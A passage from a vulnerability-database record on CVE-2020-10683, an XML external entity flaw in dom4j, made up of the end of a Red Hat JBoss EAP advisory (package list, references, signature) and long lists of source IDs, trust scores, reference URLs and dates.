_00001.1.el6eap.noarch.rpm\neap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-core-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-entitymanager-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-envers-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-java8-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-validator-cdi-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-cachestore-jdbc-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-cachestore-remote-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-client-hotrod-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-core-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-spi-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-v53-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-spi-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-core-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-core-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-deployers-common-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-jdbc-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-validator-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-datatype-jdk8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-datatype-jsr310-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-jaxrs-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-jaxrs-json-provider-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-module-jaxb-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-cli-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-core-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap6.4-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap6.4-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.2-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.3-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly10.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly10.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly11.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly12.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly13.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly14.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly15.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly16.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly17.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly18.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly8.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly9.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.noarch.rpm\neap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-netty-all-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.noarch.rpm\neap7-undertow-server-1.6.2-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-elytron-tool-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-client-common-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-ejb-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-naming-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-transaction-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-javadocs-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-modules-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14900\nhttps://access.redhat.com/security/cve/CVE-2020-1710\nhttps://access.redhat.com/security/cve/CVE-2020-1748\nhttps://access.redhat.com/security/cve/CVE-2020-10672\nhttps://access.redhat.com/security/cve/CVE-2020-10673\nhttps://access.redhat.com/security/cve/CVE-2020-10683\nhttps://access.redhat.com/security/cve/CVE-2020-10687\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10714\nhttps://access.redhat.com/security/cve/CVE-2020-10718\nhttps://access.redhat.com/security/cve/CVE-2020-10740\nhttps://access.redhat.com/security/cve/CVE-2020-14297\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXzqIS9zjgjWX9erEAQjYNxAAk4rojlcRbfjwu0wlWLTU1MbxQNclVtVh\nMpQnFzyvJVVXX0lslx7NGxHlRNWRgqI/XC1QDqlHpRs4du5/a2Uj+8c5u+WPQefF\nQCqOvSntbMli42/I7+fCehLVofx/HkuAVcBoGrIGby1E4rddDljh4bH3r43I7wa5\nHN9ki8uFAy8bIAzfXW+RB4rxtnsAABv/VFoH1fWmrXCXE6A6aG+AU86ddty0JQHN\nJhQp6v/X/3ccCvHYTAO8vlbqIJ4fE86e1+5oRBor+4ZD4mMVzGKm4cf8CMPXsKIB\n9dFGo8WHFBgEi4hBbBFtFfaE2DGZ6K4Q7X0IAhiiYJmpPg8NgzGiqVvOAG+/OrBz\nDE84ZPxZwS1zR82wwIyHP4W5mYIhQTxhtp+E9Klu4gpFIAmK8bVfGf2Ub0HOCS6z\nsbN1Eiv0SBfWRHBfBkuRTBd0aEcmGRNl4GSXzXtanTf0OhFk/4pxdJPmKDEBFWvg\n3dtwFi7+/8JoAch8GKQCo4UoSo6etQu45sUH6Q8ozuxYA72+J9K7cpwp/fVhiYRT\nnruC+2HDuugrC8UVJ/24E++49omdSXAm+UR9tvkFdVU3IpXLJNWO8s4QbrGC7CN7\nLvg/ukygGhrEEyQ1J9yYSeeNISQWJGOSKj/bgYRAh/AbX/QcZZfus7ppAasNjndn\nBk4PSTq9yaw=\n=ZNiG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 20. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nThe JBoss server process must be restarted for the update to take effect", sources: [ { db: "NVD", id: "CVE-2020-10683", }, { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, ], trust: 1.71, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://www.scap.org.cn/vuln/vhn-163186", trust: 0.1, type: "unknown", }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2020-10683", trust: 2.5, }, { db: "PACKETSTORM", id: "158891", trust: 0.8, }, { db: "PACKETSTORM", id: "159544", trust: 0.8, }, { db: "PACKETSTORM", id: "159015", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-202004-1133", trust: 0.7, }, { db: "PACKETSTORM", id: "159083", trust: 0.7, }, { db: "PACKETSTORM", id: "159921", trust: 0.7, }, { db: "PACKETSTORM", id: "160562", trust: 0.7, }, { db: "PACKETSTORM", id: "158916", trust: 0.7, }, { db: "AUSCERT", id: "ESB-2020.2837", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.4464", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2087", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2826", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.1581", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2023.3781", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3894", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2992", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3742", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3513", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3065", trust: 0.6, }, { db: "CS-HELP", id: "SB2021042542", trust: 0.6, }, { db: "CS-HELP", id: "SB2021072165", trust: 0.6, }, { db: "CS-HELP", id: "SB2022072096", trust: 0.6, }, { db: "CS-HELP", id: "SB2021042642", trust: 0.6, }, { db: "CS-HELP", id: "SB2021072747", trust: 0.6, }, { db: "NSFOCUS", id: "47453", trust: 0.6, }, { db: "PACKETSTORM", id: "159081", trust: 0.2, }, { db: "PACKETSTORM", id: "158881", trust: 0.2, }, { db: "PACKETSTORM", id: "159080", trust: 0.2, }, { db: "PACKETSTORM", id: "159924", trust: 0.2, }, { db: "PACKETSTORM", id: "158884", trust: 0.2, }, { db: "PACKETSTORM", id: "158889", trust: 0.1, }, { db: "PACKETSTORM", id: "159082", trust: 0.1, }, { db: "CNVD", id: "CNVD-2020-33467", trust: 0.1, }, { db: "VULHUB", id: "VHN-163186", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, id: "VAR-202005-1054", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-163186", }, ], trust: 0.01, }, last_update_date: "2024-11-29T21:58:44.698000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "dom4j Fixes for code issue vulnerabilities", trust: 0.6, url: "http://123.124.177.30/web/xxk/bdxqById.tag?id=116859", }, ], sources: [ { db: "CNNVD", id: "CNNVD-202004-1133", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-611", trust: 1.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpuapr2021.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { trust: 1.7, url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { trust: 1.7, url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { trust: 1.7, url: "https://cheatsheetseries.owasp.org/cheatsheets/xml_external_entity_prevention_cheat_sheet.html", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/issues/87", }, { trust: 1.7, url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { trust: 1.7, url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { trust: 1.7, url: "https://usn.ubuntu.com/4575-1/", }, { trust: 1.4, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10683", }, { trust: 1.3, url: "https://access.redhat.com/security/cve/cve-2020-10683", }, { trust: 1, url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3cdev.velocity.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3cdev.velocity.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3cnotifications.freemarker.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3cnotifications.freemarker.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3cdev.velocity.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3cdev.velocity.apache.org%3e", }, { trust: 0.7, url: "https://access.redhat.com/security/cve/cve-2020-10714", }, { trust: 0.7, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14900", }, { trust: 0.7, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.7, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.7, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10714", }, { trust: 0.7, url: "https://bugzilla.redhat.com/):", }, { trust: 0.7, url: "https://access.redhat.com/security/cve/cve-2019-14900", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10693", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-10693", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1748", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-1748", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10740", }, { trust: 0.6, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-10673", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-10740", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10673", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3513/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2023.3781", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/160562/red-hat-security-advisory-2020-5568-01.html", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2022072096", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2992/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159544/ubuntu-security-notice-usn-4575-1.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.4464/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2087/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159015/red-hat-security-advisory-2020-3585-01.html", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021072165", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159921/red-hat-security-advisory-2020-4960-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2837/", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/6525182", }, { trust: 0.6, url: "https://www.oracle.com/security-alerts/cpujul2021.html", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/158916/red-hat-security-advisory-2020-3501-01.html", }, { trust: 0.6, url: "http://www.nsfocus.net/vulndb/47453", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3894/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1581/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletinibm-resilient-soar-is-using-components-with-known-vulnerabilities-dom4j-cve-2020-10683/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/158891/red-hat-security-advisory-2020-3463-01.html", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-jquery-spring-dom4j-mongodb-linux-kernel-targetcli-fb-jackson-node-js-and-apache-commons-affect-ibm-spectrum-protect-plus/", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021042542", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021072747", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021042642", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2826/", }, { trust: 0.6, url: "https://vigilance.fr/vulnerability/dom4j-external-xml-entity-injection-via-saxreader-32161", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-dom4j-as-used-by-ibm-qradar-siem-contains-multiple-vulnerabilities-cve-2018-1000632-cve-2020-10683/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3742/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159083/red-hat-security-advisory-2020-3642-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3065/", }, { trust: 0.5, url: "https://issues.jboss.org/):", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1710", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-14297", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-10672", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10687", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-14297", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10672", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-10687", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-1710", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-10718", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10718", }, { trust: 0.4, url: "https://access.redhat.com/articles/11258", }, { trust: 0.4, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2020-6950", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2020-6950", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2020-14307", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2020-14307", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1954", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-1954", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-9547", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-1695", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-9546", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-9547", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-9548", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1695", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/html-single/installation_guide/", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-9548", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-8840", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-9546", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-8840", }, { trust: 0.1, url: "https://usn.ubuntu.com/4575-1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/dom4j/1.6.1+dfsg.3-2ubuntu1.1", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-2875", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-2934", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-2933", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4961", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17566", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1945", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17566", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1945", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-2875", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-2934", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-2933", }, { trust: 0.1, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.9/", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=rhpam&version=7.9.0", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3461", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3637", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1719", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10172", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3585", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product\\xeap-cd&version", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11612", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10719", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1719", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10705", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10172", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10705", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-11612", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10719", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/20/", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14371", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-14371", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3463", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3639", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3464", }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-05-01T00:00:00", db: "VULHUB", id: "VHN-163186", }, { date: "2020-10-14T16:51:24", db: "PACKETSTORM", id: "159544", }, { date: "2020-11-06T15:18:46", db: "PACKETSTORM", id: "159924", }, { date: "2020-08-17T17:34:41", db: "PACKETSTORM", id: "158884", }, { date: "2020-09-07T16:38:23", db: "PACKETSTORM", id: "159081", }, { date: "2020-08-31T16:22:15", db: "PACKETSTORM", id: "159015", }, { date: "2020-08-17T17:43:22", db: "PACKETSTORM", id: "158891", }, { date: "2020-09-07T16:37:51", db: "PACKETSTORM", id: "159080", }, { date: 